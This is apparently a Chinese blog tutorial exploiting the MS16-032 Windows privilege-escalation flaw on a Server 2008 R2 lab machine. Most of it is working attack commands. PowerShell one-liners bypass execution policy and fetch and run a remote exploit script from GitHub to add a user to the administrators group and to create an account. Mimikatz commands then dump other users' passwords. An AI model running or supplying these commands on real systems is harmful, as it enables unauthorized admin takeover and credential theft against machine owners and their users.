MS16-032漏洞利用

MS16-032漏洞利用

靶机:Windows server2008R2

1、 创建标准用户。创建用户zhuzhuxia,此用户为普通用户。在cmd下使用net user zhuzhuxia可以看到在*user组中。



2、 提权。使用MS16-032漏洞,使用powershell一句话提权,将zhuzhuxia这个用户放到管理员组中去。利用脚本如下:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net localgroup administrators zhuzhuxia /add'"

执行完命令后,有如下提示,说明提权成功。


 再执行命令net user zhuzhuxia,zhuzhuxia这个用户已经归到管理员组。这时候就可以为所欲为了。

如下图所示。



此时还可以借助mimikatz工具来窃取本机其他账号和密码。使用管理员身份运行该程序。



打开mimikatz后,分别执行privilege::debug

sekurlsa::logonpasswords

执行完命令后,可以获取到其他用户和密码、PIN、所在域等信息.


PS:提权后执行某些进程或程序,如修改IP,需要输入密码访客执行,若不知道当前用户密码,可以执行命令创建用户sunwukong:

powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/Ridter/Pentest/master/powershell/MyShell/Invoke-MS16-032.ps1');Invoke-MS16-032 -Application cmd.exe -commandline '/c net user sunwukong CVTE@123 /add'"

此用户为标准用户,可以再次使用步骤2提权即可。

©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容